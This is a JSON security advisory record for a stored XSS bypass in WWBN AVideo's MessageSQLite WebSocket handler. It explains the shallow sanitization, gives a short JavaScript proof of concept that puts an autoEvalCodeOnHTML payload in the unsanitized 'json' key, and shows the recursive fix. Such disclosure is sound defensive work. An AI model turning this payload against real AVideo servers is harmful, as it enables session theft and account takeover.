{"id":"GHSA-2fhx-q92v-5fhv","summary":"WWBN AVideo: Stored XSS via autoEvalCodeOnHTML Bypass in MessageSQLite WebSocket Handler (CVE-2026-43874 Bypass)","details":"# AVideo: Stored XSS via `autoEvalCodeOnHTML` in MessageSQLite WebSocket Handler\n\n## Summary\n\nAVideo has a stored XSS vulnerability in the WebSocket messaging system. The `MessageSQLite.php` handler only strips `autoEvalCodeOnHTML` from `$json['msg']`, but `msgToResourceId()` reads from `$msg['json']` with higher priority. An attacker can place the XSS payload in the `json` key instead of `msg`, bypassing the sanitization entirely.\n\n\n## Affected Versions\n\nAVideo \u003c= latest\n\n## Vulnerability Details\n\n### Root Cause: Shallow sanitization only covers `$json['msg']`\n\n`plugin/YPTSocket/MessageSQLite.php` lines 268-271 — the incomplete fix:\n\n```php\nif (empty($msgObj-\u003eisCommandLineInterface) && ($msgObj-\u003esentFrom ?? '') !== 'php') {\n    if (is_array($json['msg'] ?? null)) {\n        unset($json['msg']['autoEvalCodeOnHTML']);  // Only strips from $json['msg']\n    }\n}\n```\n\n`plugin/YPTSocket/MessageSQLite.php` lines 361-367 — the bypass via `msgToResourceId()`:\n\n```php\nif (!empty($msg['json'])) {\n    $obj['msg'] = $msg['json'];       // $msg['json']['autoEvalCodeOnHTML'] is NEVER stripped\n} else if (!empty($msg['msg'])) {\n    $obj['msg'] = $msg['msg'];        // Only this path was sanitized\n} else {\n    $obj['msg'] = $msg;\n}\n```\n\nCompare with the correctly patched `Message.php` (lines 254-256):\n\n```php\n$json = removeAutoEvalCodeOnHTMLRecursive($json);  // Strips from ALL nested paths\n```\n\nAnd `MessageSQLiteV2.php` (lines 302-303):\n\n```php\n$json = removeAutoEvalCodeOnHTMLRecursive($json);  // Same recursive fix\n```\n\n`MessageSQLite.php` does not call `removeAutoEvalCodeOnHTMLRecursive()` at all.\n\n### Attack Chain\n\n- Attacker sends a WebSocket message with `autoEvalCodeOnHTML` in the `json` key instead of `msg`\n- The fix at line 268-271 only checks `$json['msg']` — the `json` key is untouched\n- `msgToResourceId()` reads `$msg['json']` first (line 361) because `!empty($msg['json'])` is true\n- The payload is delivered to the victim's WebSocket client and evaluated via `autoEvalCodeOnHTML`\n\n## Proof of Concept\n\n```javascript\n// Connect to AVideo WebSocket as authenticated user\nconst ws = new WebSocket('wss://TARGET/plugin/YPTSocket/server.php?token=USER_TOKEN');\n\nws.onopen = () =\u003e {\n  ws.send(JSON.stringify({\n    msg: \"Hello\",                               // sanitized path — decoy\n    json: {autoEvalCodeOnHTML: \"alert('XSS')\"},  // unsanitized path — payload\n    to_users_id: VICTIM_USER_ID,\n    resourceId: RESOURCE_ID\n  }));\n};\n// Victim's client evaluates alert('XSS') via autoEvalCodeOnHTML mechanism\n```\n\n## Impact\n\nAn authenticated attacker can:\n\n- Execute arbitrary JavaScript in any connected user's browser session via the WebSocket messaging system\n- Steal session cookies and authentication tokens\n- Perform account takeover via session hijacking\n- Chain with CSRF to execute admin actions on behalf of the victim\n\nThe vulnerability affects the default SQLite WebSocket backend configuration.\n\n## Suggested Remediation\n\nApply `removeAutoEvalCodeOnHTMLRecursive()` in `MessageSQLite.php`, consistent with `Message.php` and `MessageSQLiteV2.php`:\n\n```php\n// Before (vulnerable — shallow strip):\nif (is_array($json['msg'] ?? null)) {\n    unset($json['msg']['autoEvalCodeOnHTML']);\n}\n\n// After (fixed — recursive strip):\n$json = removeAutoEvalCodeOnHTMLRecursive($json);\n```","aliases":["CVE-2026-49279"],"modified":"2026-09-10T03:51:07.357450113Z","published":"2026-06-04T18:55:04Z","database_specific":{"github_reviewed_at":"2026-06-04T18:55:04Z","nvd_published_at":null,"cwe_ids":["CWE-79"],"severity":"HIGH","github_reviewed":true},"references":[{"type":"WEB","url":"https://github.com/WWBN/AVideo/security/advisories/GHSA-2fhx-q92v-5fhv"},{"type":"WEB","url":"https://github.com/WWBN/AVideo/commit/3e0b3ce2bfa766183ff0ae227439394db57b1a23"},{"type":"PACKAGE","url":"https://github.com/WWBN/AVideo"}],"affected":[{"package":{"name":"wwbn/avideo","ecosystem":"Packagist","purl":"pkg:composer/wwbn/avideo"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"last_affected":"29.0"}]}],"versions":["10.4","10.8","11","11.1","11.1.1","11.5","11.6","12.4","14.3","14.3.1","14.4","18.0","21.0","22.0","24.0","25.0","26.0","29.0"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/06/GHSA-2fhx-q92v-5fhv/GHSA-2fhx-q92v-5fhv.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"}]}